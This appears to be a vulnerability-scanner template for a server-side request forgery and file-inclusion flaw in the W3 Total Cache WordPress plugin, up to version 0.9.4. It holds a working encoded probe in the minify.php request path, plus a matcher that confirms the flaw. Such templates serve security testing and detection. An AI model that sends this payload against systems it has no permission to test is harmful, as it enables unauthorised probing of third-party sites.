id: w3c-total-cache-ssrf
info:
  name: Wordpress W3C Total Cache SSRF <= 0.9.4
  author: random-robbie
  severity: medium
  tags: wordpress,wp-plugin

  # Reference
  # https://wpvulndb.com/vulnerabilities/8644
  # https://klikki.fi/adv/w3_total_cache.html

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css'
    matchers:
      - type: word
        words:
          - "NessusFileIncludeTest"
        part: body